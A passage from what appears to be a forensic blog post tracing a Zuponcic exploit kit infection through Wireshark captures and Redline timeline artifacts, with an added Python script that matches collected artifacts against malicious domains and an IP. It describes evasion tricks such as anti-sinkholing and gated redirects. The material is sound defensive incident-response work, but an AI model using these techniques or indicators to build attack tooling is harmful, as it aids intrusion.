<span style="font-family: Arial,Helvetica,sans-serif;">Request to the infected website (malicious .htaccess file), arriving via a Google search redirect: <i>(the .htaccess checks Cookie, Referer and User-Agent before redirecting)</i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial,Helvetica,sans-serif;"></span><a href="http://2.bp.blogspot.com/-u8yJs3Gqeu0/U8xKt3LvpRI/AAAAAAAAAYg/UBr_t1J7xYo/s1600/Wireshark_stream-niceshop-redir-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-u8yJs3Gqeu0/U8xKt3LvpRI/AAAAAAAAAYg/UBr_t1J7xYo/s1600/Wireshark_stream-niceshop-redir-1.png" height="*" width="800" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;">Redirection to the first Zuponcic Kit stage <i>(checks the client IP)</i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial,Helvetica,sans-serif;"></span> <a href="http://4.bp.blogspot.com/-aKusa0wImC8/U8xKuPMVndI/AAAAAAAAAYc/sIGLkjRWVE4/s1600/Wireshark_stream-niceshop-redir-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-aKusa0wImC8/U8xKuPMVndI/AAAAAAAAAYc/sIGLkjRWVE4/s1600/Wireshark_stream-niceshop-redir-2.png" height="*" width="800" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;">Request to main Zuponcic Kit page: </span><a href="http://4.bp.blogspot.com/-Kqf2DO6n2i8/U8xKuzQA7oI/AAAAAAAAAYo/8PFUnCgf1pI/s1600/Wireshark_stream-niceshop-redir-3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-Kqf2DO6n2i8/U8xKuzQA7oI/AAAAAAAAAYo/8PFUnCgf1pI/s1600/Wireshark_stream-niceshop-redir-3.png" height="*" width="800" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="http://2.bp.blogspot.com/-Q_sFaGN8Rso/U8xKvQyx-DI/AAAAAAAAAYk/bHIG7IkjXqg/s1600/Wireshark_stream-niceshop-redir-3b.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-Q_sFaGN8Rso/U8xKvQyx-DI/AAAAAAAAAYk/bHIG7IkjXqg/s1600/Wireshark_stream-niceshop-redir-3b.png" height="*" width="800" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;">Request to "java.js" for browser (and Java) fingerprinting:</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-WUxpUU4sgQk/U90K-4uOD9I/AAAAAAAAAhs/eaT8XJ0PzCc/s1600/Wireshark_stream-niceshop-java-js-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-WUxpUU4sgQk/U90K-4uOD9I/AAAAAAAAAhs/eaT8XJ0PzCc/s1600/Wireshark_stream-niceshop-java-js-1.png" height="*" width="800" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;"></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;">Malicious JAR downloader signed with a stolen certificate:</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-HQJoW4PilMM/U8xKs7sWfBI/AAAAAAAAAY4/dEEvQH_nNq8/s1600/Wireshark_stream-niceshop-jar-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-HQJoW4PilMM/U8xKs7sWfBI/AAAAAAAAAY4/dEEvQH_nNq8/s1600/Wireshark_stream-niceshop-jar-1.png" height="*" width="800" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;">POST request submitting a long parameter (key?) and receiving a large binary (encrypted) file:</span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial,Helvetica,sans-serif;"></span><a href="http://2.bp.blogspot.com/-PoQpfGv-Gg8/U8xKs9k50II/AAAAAAAAAYI/24sQ_Z963b4/s1600/Wireshark_stream-niceshop-CC-post-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-PoQpfGv-Gg8/U8xKs9k50II/AAAAAAAAAYI/24sQ_Z963b4/s1600/Wireshark_stream-niceshop-CC-post-1.png" height="*" width="800" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;">GET request to an IP address (computed from the result of a DNS lookup of "</span><span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-family: "Courier New",Courier,monospace;">fasternation.net</span>" -- an anti-sinkholing technique: the resolved address is only an input to the computation, so taking over the domain alone does not redirect the C&C traffic), sending data as Cookie values and using a faked User-Agent:</span><a href="http://4.bp.blogspot.com/-6QSpYJ1Yjow/U8xKs16MhwI/AAAAAAAAAYw/9uxtkymmG48/s1600/Wireshark_stream-niceshop-CC-get-cookie-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-6QSpYJ1Yjow/U8xKs16MhwI/AAAAAAAAAYw/9uxtkymmG48/s1600/Wireshark_stream-niceshop-CC-get-cookie-1.png" height="*" width="800" /></a></div>
<h2 class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;">Screenshots during VM infection</span></h2>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;"></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;">Depending on the installed Java version and its security settings, the user may see one or more Java warnings during the infection that try to stop the applet from running. The dialogs below are from the VM run.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial,Helvetica,sans-serif;"></span><a href="http://2.bp.blogspot.com/-wKTOWCVAQvw/U8b_yDfNbwI/AAAAAAAAAXM/Dp9cO4TTx0w/s1600/2014-07-14_000106_a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-wKTOWCVAQvw/U8b_yDfNbwI/AAAAAAAAAXM/Dp9cO4TTx0w/s1600/2014-07-14_000106_a.png" height="*" width="800" /></a></div>
<div style="text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial,Helvetica,sans-serif;"></span><a href="http://3.bp.blogspot.com/-_Gs9bdKwVSU/U8xP7l-shkI/AAAAAAAAAZI/O78e9-LGBQA/s1600/Java-Alert-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-_Gs9bdKwVSU/U8xP7l-shkI/AAAAAAAAAZI/O78e9-LGBQA/s1600/Java-Alert-2.png" height="*" width="800" /></a></div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial,Helvetica,sans-serif;"></span><a href="http://4.bp.blogspot.com/-xZTHEygUylw/U8xP7pPsF7I/AAAAAAAAAZE/juA2CKs1aL0/s1600/OnUnload-Alert-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-xZTHEygUylw/U8xP7pPsF7I/AAAAAAAAAZE/juA2CKs1aL0/s1600/OnUnload-Alert-1.png" height="*" width="800" /></a></div>
<div style="text-align: left;">
<br />
<br />
<span style="font-family: Arial,Helvetica,sans-serif;">In Process Hacker the malware process looks like this:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-cIz4kvwzBDg/U9mAIk14oSI/AAAAAAAAAgA/b6AEf7Slve0/s1600/ProcessHacker_rnd-mal-exe-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-cIz4kvwzBDg/U9mAIk14oSI/AAAAAAAAAgA/b6AEf7Slve0/s1600/ProcessHacker_rnd-mal-exe-1.png" height="*" width="800" /></a></div>
<span style="font-family: Arial,Helvetica,sans-serif;"></span><br />
<br />
<h2>
<span style="font-family: Arial,Helvetica,sans-serif;">Running Redline Collector</span></h2>
<span style="font-family: Arial,Helvetica,sans-serif;">The recommended way to run Redline Collector on a host is from a USB key. If you are not concerned about modifying the host under investigation, you can also run it remotely by copying it over the network or launching it from a mounted share. Keep in mind that this still leaves traces on the host (the copied files, a Prefetch entry for the collector, the share connection), so note the time you started it and exclude those artifacts when you build the timeline.</span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;">I may write more details about how to run Redline Collector remotely over the net in a later blog post. In this post I'd like to focus on the details available from a Redline analysis.</span><br />
<br />
<span style="font-family: Arial,Helvetica,sans-serif;">Here is a list of modules and options selected for this collection:</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-SgSRaCFlpHw/U90MgB8vhOI/AAAAAAAAAh4/dHsjrMZnxXk/s1600/Redline_analysis-data-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-SgSRaCFlpHw/U90MgB8vhOI/AAAAAAAAAh4/dHsjrMZnxXk/s1600/Redline_analysis-data-1.png" /></a></div>
<br />
<br />
<span style="font-family: Arial,Helvetica,sans-serif;">The XML files created during collection can get pretty large, depending on which modules are executed and on the settings in the script. The registry, event logs and file system make up the largest part of this collection. Still, the 537 MB of raw data compress nicely into 33 MB, which is small compared to a hard drive image or a memory dump.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-Sn30PY7HEzQ/U9vSgbMfdGI/AAAAAAAAAhc/3DDH7ehFPDw/s1600/Redline_collection-files-CMD-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-Sn30PY7HEzQ/U9vSgbMfdGI/AAAAAAAAAhc/3DDH7ehFPDw/s1600/Redline_collection-files-CMD-1.png" /></a></div>
<br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-23FEE0acgHk/U9mNCZzwkKI/AAAAAAAAAg0/cvxHXE34E0I/s1600/Redline_collection-files-3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-23FEE0acgHk/U9mNCZzwkKI/AAAAAAAAAg0/cvxHXE34E0I/s1600/Redline_collection-files-3.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-41J-T9kkKPs/U9mNCmU0i9I/AAAAAAAAAg4/C48IFKSlUDk/s1600/Redline_collection-files-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-41J-T9kkKPs/U9mNCmU0i9I/AAAAAAAAAg4/C48IFKSlUDk/s1600/Redline_collection-files-2.png" /></a></div>
<br />
<br />
<h2>
<span style="font-family: Arial,Helvetica,sans-serif;">Analysis using Redline</span></h2>
</div>
<div style="text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;"></span></div>
<div style="text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;"></span></div>
<div style="text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;">After running Redline Collector on a suspicious or infected host you get a lot of data (in XML format) to analyze with Redline, but grep and some other bash-fu (on Linux or Cygwin) over the raw XML files can be just as useful, for example to search all artifact types for a domain or file name at once.</span></div>
<div style="text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;">Redline's timeline function is easy to use and powerful: it lines up all collected artifacts on one time axis, and you select which timestamp fields of each artifact type feed the timeline.</span></div>
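<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;">The same timeline idea can be reproduced outside the GUI with Python's standard library, which is handy for scripting the grep-style searches mentioned above. The following is an added example written for this post, not code from the original article or from Redline itself: it flattens the per-artifact XML into one sorted event list, matches it against the network indicators from the traffic listing earlier in this post, and pivots to a time window around the first hit. The element names in TIMESTAMP_FIELDS are an assumption modelled on the Redline/MIR audit XML, not its real schema; the embedded sample collection, its paths and its timestamps are constructed.</span></div>

```python
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta

# Artifact type -> (element holding the description, element holding the timestamp to plot).
# These names are an assumption modelled on the Redline/MIR audit XML; check them against
# the files your collector actually produced and extend the table as needed.
TIMESTAMP_FIELDS = {
    "UrlHistoryItem":    ("URL", "LastVisitDate"),
    "CookieHistoryItem": ("HostName", "CreationDate"),
    "PrefetchItem":      ("ApplicationFullPath", "LastRun"),
    "FileItem":          ("FullPath", "Created"),
    "ProcessItem":       ("path", "startTime"),
}

# Network indicators taken from the traffic listing earlier in this post.
IOCS = ["niceshop.at", "mw.prodigymsnteregala.com", "93.115.88.220", "fasternation.net"]

def parse_ts(text):
    return datetime.strptime(text, "%Y-%m-%dT%H:%M:%SZ")

def timeline_from_xml(xml_text):
    """Flatten every known artifact item into (timestamp, type, description), oldest first."""
    root = ET.fromstring(xml_text)
    events = []
    for tag, (desc_field, ts_field) in TIMESTAMP_FIELDS.items():
        for item in root.iter(tag):
            desc, ts = item.findtext(desc_field), item.findtext(ts_field)
            if desc is None or ts is None:
                continue  # incomplete item: skip it rather than invent a time for it
            events.append((parse_ts(ts), tag, desc))
    return sorted(events)

def ioc_hits(events, iocs=IOCS):
    """Only the events whose description mentions one of the indicators."""
    return [e for e in events if any(ioc in e[2] for ioc in iocs)]

def pivot_window(events, anchor, before=timedelta(minutes=2), after=timedelta(minutes=5)):
    """Everything that happened shortly before/after an anchor time, e.g. the first IOC hit."""
    return [e for e in events if anchor - before <= e[0] <= anchor + after]

# Constructed sample collection, shaped like the chain in this post: Google redirect ->
# cookie from the compromised site -> java.js -> java.exe Prefetch -> dropped file.
# Paths and times are made up; the URLs and host names are the ones from this post.
SAMPLE_XML = r"""<audits>
  <UrlHistoryItem><URL>http://www.example.org/</URL><LastVisitDate>2014-07-13T21:50:00Z</LastVisitDate></UrlHistoryItem>
  <UrlHistoryItem><URL>http://www.google.ch/url?url=http://www.niceshop.at/</URL><LastVisitDate>2014-07-13T21:58:10Z</LastVisitDate></UrlHistoryItem>
  <CookieHistoryItem><HostName>www.niceshop.at</HostName><CreationDate>2014-07-13T21:58:12Z</CreationDate></CookieHistoryItem>
  <UrlHistoryItem><URL>http://mw.prodigymsnteregala.com/js/java.js</URL><LastVisitDate>2014-07-13T21:58:20Z</LastVisitDate></UrlHistoryItem>
  <PrefetchItem><ApplicationFullPath>C:\Program Files (x86)\Java\jre7\bin\java.exe</ApplicationFullPath><LastRun>2014-07-13T21:58:25Z</LastRun></PrefetchItem>
  <FileItem><FullPath>C:\Users\user\AppData\Local\Temp\a1b2c3.tmp</FullPath><Created>2014-07-13T21:58:40Z</Created></FileItem>
</audits>"""

if __name__ == "__main__":
    events = timeline_from_xml(SAMPLE_XML)
    first_hit = ioc_hits(events)[0]
    for ts, kind, desc in pivot_window(events, first_hit[0]):
        print(ts.isoformat(), kind, desc)
```

<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;">On the sample data the first indicator hit is the Google redirect at 21:58:10, and the pivot window then shows the cookie, the java.js request, the java.exe Prefetch entry and the dropped file in the following 30 seconds, while the unrelated earlier browsing is left out. With real collections, point the parser at each audit file in turn and merge the lists before sorting.</span></div>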
<div style="text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-6z8eaIKtP18/U90NJAyAUjI/AAAAAAAAAiA/cCLG7ScU7ik/s1600/Redline_timeline-config-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-6z8eaIKtP18/U90NJAyAUjI/AAAAAAAAAiA/cCLG7ScU7ik/s1600/Redline_timeline-config-1.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-YsSTCZ_vCfo/U90NJAPUHHI/AAAAAAAAAiE/esorvAqd7Pw/s1600/Redline_timeline-config-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-YsSTCZ_vCfo/U90NJAPUHHI/AAAAAAAAAiE/esorvAqd7Pw/s1600/Redline_timeline-config-2.png" /></a></div>
<span style="font-family: Arial,Helvetica,sans-serif;"></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;">Here are some artifacts from the timeline of this infection.</span></div>
<div style="text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;">Google redirection URL</span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial,Helvetica,sans-serif;"></span><a href="http://3.bp.blogspot.com/-RuiPbK0sXPw/U8xSOPC48uI/AAAAAAAAAZo/V5hQbXwE1gU/s1600/Redline_google-redir-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-RuiPbK0sXPw/U8xSOPC48uI/AAAAAAAAAZo/V5hQbXwE1gU/s1600/Redline_google-redir-1.png" height="*" width="800" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-P5hKKZoe25w/U9gR2l9Cd_I/AAAAAAAAAdc/_Dlc7NSCc3E/s1600/Redline_google-redir-1a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-P5hKKZoe25w/U9gR2l9Cd_I/AAAAAAAAAdc/_Dlc7NSCc3E/s1600/Redline_google-redir-1a.png" /></a></div>
<span style="font-family: Arial,Helvetica,sans-serif;"></span><br />
<br />
<span style="font-family: Arial,Helvetica,sans-serif;">A cookie is set by the infected web server to mark the first visit:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial,Helvetica,sans-serif;"></span><a href="http://3.bp.blogspot.com/-zTAwSrm-fmY/U8xSO8nTIOI/AAAAAAAAAaA/GHTo2oxrOeA/s1600/Redline_niceshop-cookie.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-zTAwSrm-fmY/U8xSO8nTIOI/AAAAAAAAAaA/GHTo2oxrOeA/s1600/Redline_niceshop-cookie.png" height="*" width="800" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-H5RyKI-kG60/U9gR2vpqlbI/AAAAAAAAAdY/rJYiBXHj0f8/s1600/Redline_niceshop-cookie-1a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-H5RyKI-kG60/U9gR2vpqlbI/AAAAAAAAAdY/rJYiBXHj0f8/s1600/Redline_niceshop-cookie-1a.png" /></a></div>
<span style="font-family: Arial,Helvetica,sans-serif;"></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;">First request to Zuponcic Kit domain:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial,Helvetica,sans-serif;"></span><a href="http://2.bp.blogspot.com/-9fbqmcXjoEE/U8xSOWSumQI/AAAAAAAAAZs/2IaYbSnHH0I/s1600/Redline_mal-domain-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-9fbqmcXjoEE/U8xSOWSumQI/AAAAAAAAAZs/2IaYbSnHH0I/s1600/Redline_mal-domain-1.png" height="*" width="800" /></a></div>
<div style="text-align: left;">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-qLKWA9zerl8/U9gR2tRo23I/AAAAAAAAAdg/3BXJ0a7CgnQ/s1600/Redline_mal-domain-1a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-qLKWA9zerl8/U9gR2tRo23I/AAAAAAAAAdg/3BXJ0a7CgnQ/s1600/Redline_mal-domain-1a.png" /></a></div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;">Request to "java.js" for loading the Java applet:</span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial,Helvetica,sans-serif;"></span><a href="http://1.bp.blogspot.com/-wGlrMkcwYjk/U8xU5v9fPAI/AAAAAAAAAb0/bz8p_kEl37k/s1600/Redline_mal-domain-java-js-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-wGlrMkcwYjk/U8xU5v9fPAI/AAAAAAAAAb0/bz8p_kEl37k/s1600/Redline_mal-domain-java-js-1.png" height="*" width="800" /></a></div>
<div style="text-align: left;">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-ien1nfhjrIw/U9gSxI9wprI/AAAAAAAAAdw/GA-89hpEYUA/s1600/Redline_mal-domain-java-js-1a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-ien1nfhjrIw/U9gSxI9wprI/AAAAAAAAAdw/GA-89hpEYUA/s1600/Redline_mal-domain-java-js-1a.png" /></a></div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;">Prefetch file for "java.exe" created or updated:</span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial,Helvetica,sans-serif;"></span><a href="http://1.bp.blogspot.com/-qBaW3Tpw4NU/U8xSNxgb0xI/AAAAAAAAAbA/ungV7fB68ak/s1600/Redline_file-prefetch-java-exe-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-qBaW3Tpw4NU/U8xSNxgb0xI/AAAAAAAAAbA/ungV7fB68ak/s1600/Redline_file-prefetch-java-exe-2.png" height="*" width="800" /></a></div>
<div style="text-align: left;">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-0sMPx_PTwTg/U9gTAqp5PpI/AAAAAAAAAd4/RqDitq_fieg/s1600/Redline_prefetch-java-exe-1a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-0sMPx_PTwTg/U9gTAqp5PpI/AAAAAAAAAd4/RqDitq_fieg/s1600/Redline_prefetch-java-exe-1a.png" /></a></div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;">Registry key created / updated for the malware domain serving the malicious JAR:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-j2Y3bv-BPjc/U9gXDeFBMqI/AAAAAAAAAeo/Gxd_qM9HDWM/s1600/Redline_registry-java-allowed-mal-domain-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-j2Y3bv-BPjc/U9gXDeFBMqI/AAAAAAAAAeo/Gxd_qM9HDWM/s1600/Redline_registry-java-allowed-mal-domain-1.png" height="*" width="800" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-IB2qjgPtR8k/U9gXDWZUP5I/AAAAAAAAAes/IQAEsBhj1qg/s1600/Redline_registry-java-allowed-mal-domain-1a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-IB2qjgPtR8k/U9gXDWZUP5I/AAAAAAAAAes/IQAEsBhj1qg/s1600/Redline_registry-java-allowed-mal-domain-1a.png" /></a></div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;">Prefetch file for the dropped malware TMP file:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-_MjvINjQtnk/U9gQsr8KVII/AAAAAAAAAcw/W5CjxLKl30I/s1600/Redline_prefetch-mal-exe-tmp-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-_MjvINjQtnk/U9gQsr8KVII/AAAAAAAAAcw/W5CjxLKl30I/s1600/Redline_prefetch-mal-exe-tmp-1.png" height="*" width="800" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-UO3JABorY3A/U9gQsuhwlRI/AAAAAAAAAcs/XSImqrIPoFQ/s1600/Redline_prefetch-mal-exe-tmp-1a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-UO3JABorY3A/U9gQsuhwlRI/AAAAAAAAAcs/XSImqrIPoFQ/s1600/Redline_prefetch-mal-exe-tmp-1a.png" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-9oenX18nUp4/U9gQtXb0LhI/AAAAAAAAAc8/bfkSYMeiQC0/s1600/Redline_prefetch-mal-exe-tmp-2a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-9oenX18nUp4/U9gQtXb0LhI/AAAAAAAAAc8/bfkSYMeiQC0/s1600/Redline_prefetch-mal-exe-tmp-2a.png" /></a></div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;">Malware EXE file created:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-jOHgpAox2JI/U9gQsttgv_I/AAAAAAAAAc0/ut4hma9DGOI/s1600/Redline_file-create-mal-exe.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-jOHgpAox2JI/U9gQsttgv_I/AAAAAAAAAc0/ut4hma9DGOI/s1600/Redline_file-create-mal-exe.png" height="*" width="800" /></a></div>
<span style="font-family: Arial,Helvetica,sans-serif;"></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-x1ZT7zcK1Os/U9gkdt8GTmI/AAAAAAAAAfU/upMLg-KKXz4/s1600/Redline_file-create-mal-exe-1a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-x1ZT7zcK1Os/U9gkdt8GTmI/AAAAAAAAAfU/upMLg-KKXz4/s1600/Redline_file-create-mal-exe-1a.png" /></a></div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;">Malware EXE process started:</span></div>
<div style="text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-KsW5aD1VNao/U9gWPmv-duI/AAAAAAAAAec/DmMioc1xpRQ/s1600/Redline_process-start-mal-exe-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-KsW5aD1VNao/U9gWPmv-duI/AAAAAAAAAec/DmMioc1xpRQ/s1600/Redline_process-start-mal-exe-1.png" height="*" width="800" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/--KsYRxiF-f8/U9gWPkYniFI/AAAAAAAAAeY/F1ENy32gQMw/s1600/Redline_process-start-mal-exe-1a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/--KsYRxiF-f8/U9gWPkYniFI/AAAAAAAAAeY/F1ENy32gQMw/s1600/Redline_process-start-mal-exe-1a.png" /></a></div>
<div style="text-align: left;">
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
